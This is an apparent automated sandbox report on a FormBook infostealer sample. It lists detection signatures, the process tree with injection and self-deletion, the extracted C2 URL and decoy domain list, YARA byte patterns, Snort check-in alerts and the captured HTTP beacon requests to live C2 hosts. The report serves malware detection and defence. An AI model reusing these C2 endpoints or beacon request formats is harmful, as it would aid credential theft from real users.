Windows Analysis Report WXs8v9QuE7.exe

Overview

General Information

Sample Name: WXs8v9QuE7.exe
Analysis ID: 438542
MD5: 1f45b0e2bd669bce49b2140373243a91
SHA1: 6ea61f1b39548a8b9192c0606d6daeb2c071a190
SHA256: ef05dd27e2dc499d3c1f42f00525fea7204735acd45c7a03efb78a241a9f9660
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • WXs8v9QuE7.exe (PID: 5432 cmdline: 'C:\Users\user\Desktop\WXs8v9QuE7.exe' MD5: 1F45B0E2BD669BCE49B2140373243A91)
    • WXs8v9QuE7.exe (PID: 5880 cmdline: 'C:\Users\user\Desktop\WXs8v9QuE7.exe' MD5: 1F45B0E2BD669BCE49B2140373243A91)
      • cscript.exe (PID: 1632 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
        • cmd.exe (PID: 1864 cmdline: /c del 'C:\Users\user\Desktop\WXs8v9QuE7.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 1488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • autoconv.exe (PID: 5428 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.oceancollaborative.com/bp3i/"], "decoy": ["bancambios.network", "centroufologicosiciliano.info", "personalloansonline.xyz", "xn---yado-8e4dze0c.site", "americanscientific.net", "5australiacl.com", "sportsiri.com", "harchain.com", "oakandivywedding.com", "getbattlevizion.com", "laurenamason.com", "middreampostal.com", "realityawarenetworks.com", "purpleqube.com", "reufhroir.com", "dr-farshidtajik.com", "spinecompanion.com", "grpsexportsandimports.com", "nodeaths.com", "indylead.com", "payplrif617592.info", "counteraction.fund", "t4mall.com", "lnbes.com", "5xlsteve.com", "kocaelimanliftkiralama.site", "jacksonmesser.com", "nicehips.xyz", "accelerator.sydney", "dembyanndson.com", "tori2020.com", "ilium-partners.com", "amazingfinds4u.com", "therebelpartyband.com", "mutanterestaurante.com", "underce.com", "foldarusa.com", "canyoufindme.info", "fewo-zweifall.com", "fredrika-stahl.com", "bankalmatajer.com", "themindsetbreakthrough.com", "kesat-ya10.com", "9wsc.com", "jimmymasks.com", "bluebeltpanobuy.com", "my-ela.com", "motivactivewear.com", "myrivercityhomeimprovements.com", "xn--2o2b1z87x8sb.com", "pholbhf.icu", "8ballsportsbook.com", "doodstore.net", "shenghui118.com", "glavstore.com", "mydystopianlife.com", "woodlandsceinics.com", "trickshow.club", "vitali-tea.online", "thechandeck.com", "blinbins.com", "mcgcompetition.com", "xrglm.com", "mikefling.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166c9:$sqlite3step: 68 34 1C 7B E1
  • 0x167dc:$sqlite3step: 68 34 1C 7B E1
  • 0x166f8:$sqlite3text: 68 38 2A 90 C5
  • 0x1681d:$sqlite3text: 68 38 2A 90 C5
  • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(19 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
1.1.WXs8v9QuE7.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.1.WXs8v9QuE7.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.1.WXs8v9QuE7.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166c9:$sqlite3step: 68 34 1C 7B E1
  • 0x167dc:$sqlite3step: 68 34 1C 7B E1
  • 0x166f8:$sqlite3text: 68 38 2A 90 C5
  • 0x1681d:$sqlite3text: 68 38 2A 90 C5
  • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
1.1.WXs8v9QuE7.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.1.WXs8v9QuE7.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(13 further entries not shown)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://www.purpleqube.com/bp3i/?2db=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8Etbmrh51eTDYYM&ApZx=O2MHiVr0W | Avira URL Cloud: Label: phishing
Found malware configuration
Source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.oceancollaborative.com/bp3i/"], "decoy": ["bancambios.network", "centroufologicosiciliano.info", "personalloansonline.xyz", "xn---yado-8e4dze0c.site", "americanscientific.net", "5australiacl.com", "sportsiri.com", "harchain.com", "oakandivywedding.com", "getbattlevizion.com", "laurenamason.com", "middreampostal.com", "realityawarenetworks.com", "purpleqube.com", "reufhroir.com", "dr-farshidtajik.com", "spinecompanion.com", "grpsexportsandimports.com", "nodeaths.com", "indylead.com", "payplrif617592.info", "counteraction.fund", "t4mall.com", "lnbes.com", "5xlsteve.com", "kocaelimanliftkiralama.site", "jacksonmesser.com", "nicehips.xyz", "accelerator.sydney", "dembyanndson.com", "tori2020.com", "ilium-partners.com", "amazingfinds4u.com", "therebelpartyband.com", "mutanterestaurante.com", "underce.com", "foldarusa.com", "canyoufindme.info", "fewo-zweifall.com", "fredrika-stahl.com", "bankalmatajer.com", "themindsetbreakthrough.com", "kesat-ya10.com", "9wsc.com", "jimmymasks.com", "bluebeltpanobuy.com", "my-ela.com", "motivactivewear.com", "myrivercityhomeimprovements.com", "xn--2o2b1z87x8sb.com", "pholbhf.icu", "8ballsportsbook.com", "doodstore.net", "shenghui118.com", "glavstore.com", "mydystopianlife.com", "woodlandsceinics.com", "trickshow.club", "vitali-tea.online", "thechandeck.com", "blinbins.com", "mcgcompetition.com", "xrglm.com", "mikefling.com"]}
Multi AV Scanner detection for submitted file
Source: WXs8v9QuE7.exe | Virustotal: Detection: 18%
Source: WXs8v9QuE7.exe | ReversingLabs: Detection: 19%
Yara detected FormBook
Source: Yara match | File source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.1.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.WXs8v9QuE7.exe.2280000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.WXs8v9QuE7.exe.2280000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: WXs8v9QuE7.exe | Joe Sandbox ML: detected
Source: 18.2.cscript.exe.748a10.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 18.2.cscript.exe.4d87960.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 1.1.WXs8v9QuE7.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.WXs8v9QuE7.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.WXs8v9QuE7.exe.2280000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: WXs8v9QuE7.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: cscript.pdbUGP source: WXs8v9QuE7.exe, 00000001.00000002.302941895.0000000002AC0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: WXs8v9QuE7.exe, 00000000.00000003.228184886.0000000009990000.00000004.00000001.sdmp, WXs8v9QuE7.exe, 00000001.00000002.302101367.0000000000B8F000.00000040.00000001.sdmp, cscript.exe, 00000012.00000002.495021689.0000000004850000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: WXs8v9QuE7.exe, cscript.exe
Source: Binary string: cscript.pdb source: WXs8v9QuE7.exe, 00000001.00000002.302941895.0000000002AC0000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 0_2_00405E93 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 0_2_00402671 FindFirstFileA,
Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 4x nop then pop esi
Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 4x nop then pop esi
Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 4x nop then pop ebx

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 75.2.124.199:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 75.2.124.199:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 75.2.124.199:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49750 -> 23.225.101.32:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49750 -> 23.225.101.32:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49750 -> 23.225.101.32:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49751 -> 94.136.40.51:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49751 -> 94.136.40.51:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49751 -> 94.136.40.51:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49755 -> 45.192.104.89:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49755 -> 45.192.104.89:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49755 -> 45.192.104.89:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.oceancollaborative.com/bp3i/
Source: global traffic | HTTP traffic detected: GET /bp3i/?2db=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8Etbmrh51eTDYYM&ApZx=O2MHiVr0W HTTP/1.1 | Host: www.purpleqube.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bp3i/?2db=MlxGGjj2GILR3uc1yrCD+B+Qm9+cwVH8bO7hosl1JjKtZPf8ruvdLFpmglVOZIulzoDe&ApZx=O2MHiVr0W HTTP/1.1 | Host: www.tori2020.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bp3i/?2db=80R/aSnQ9cMncl3xr61KDuAjYp2ZOr6pxPcjEdydNICfLnQ2vp9ekDHPlA0NjzWfFYRL&ApZx=O2MHiVr0W HTTP/1.1 | Host: www.underce.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bp3i/?2db=cas+hsZJvZFo3GF+EdMNCMOiV1dGjFKaknimsFdRmzAJWDDXgl+w3pBTGW4WB38KsB49&ApZx=O2MHiVr0W HTTP/1.1 | Host: www.fredrika-stahl.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bp3i/?2db=/O9fLU9fKPl9hp8FjcQBjfSEDJBN8B2QQZ2zni9zphKaS5k3K3CvlS+mwENkfwkv1cT8&ApZx=O2MHiVr0W HTTP/1.1 | Host: www.doodstore.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bp3i/?2db=E7M2l69Gv0yeE4KBOXHGh6mx//FtP199Dh6qlRwE96ss/V1ksNZ+8ksSpGi6EwZCpyax&ApZx=O2MHiVr0W HTTP/1.1 | Host: www.mutanterestaurante.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bp3i/?2db=zwAt45JEztQSRxPdch59MI6sbMm9ozxv/QrdgZuHtz8DMTYJ2HUJlOY3K2JoQYzD174Y&ApZx=O2MHiVr0W HTTP/1.1 | Host: www.9wsc.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bp3i/?2db=zbNXh78uhP7VzN8kPHFueaY47g6J6psPJhyFJvfKuCHih9LJaB8PnmAAQmuNnVgiv7yX&ApZx=O2MHiVr0W HTTP/1.1 | Host: www.5xlsteve.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bp3i/?2db=+tA82deiMnBv5x6tQvXabF4qHjy6FJLdLGXe/FevxPH8etKnEP6uMBOxOd38qIM/2l+B&ApZx=O2MHiVr0W HTTP/1.1 | Host: www.oceancollaborative.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /bp3i/?2db=zzYPr0OAQH7TXWaM6HNOV25V/HRJbXLG3d0AEq0Xu0niOsubCwaCiuhJfb7NIA/TR+lf&ApZx=O2MHiVr0W HTTP/1.1 | Host: www.motivactivewear.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | ASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View | ASN Name: AMAZON-02US AMAZON-02US
Source: unknown | DNS traffic detected: queries for: www.reufhroir.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 22 Jun 2021 16:25:18 GMT | Server: Apache | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 62 70 33 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /bp3i/ was not found on this server.</p></body></html>
Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: WXs8v9QuE7.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: WXs8v9QuE7.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: cscript.exe, 00000012.00000002.496418412.0000000004F02000.00000004.00000001.sdmp | String found in binary or memory: https://www.123-reg-new-domain.co.uk/iframe.html
Source: C:\Users\user\Desktop\WXs8v9QuE7.exe | Code function: 0_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
Source: WXs8v9QuE7.exe, 00000000.00000002.233934690.000000000075A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.1.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.WXs8v9QuE7.exe.2280000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.WXs8v9QuE7.exe.2280000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
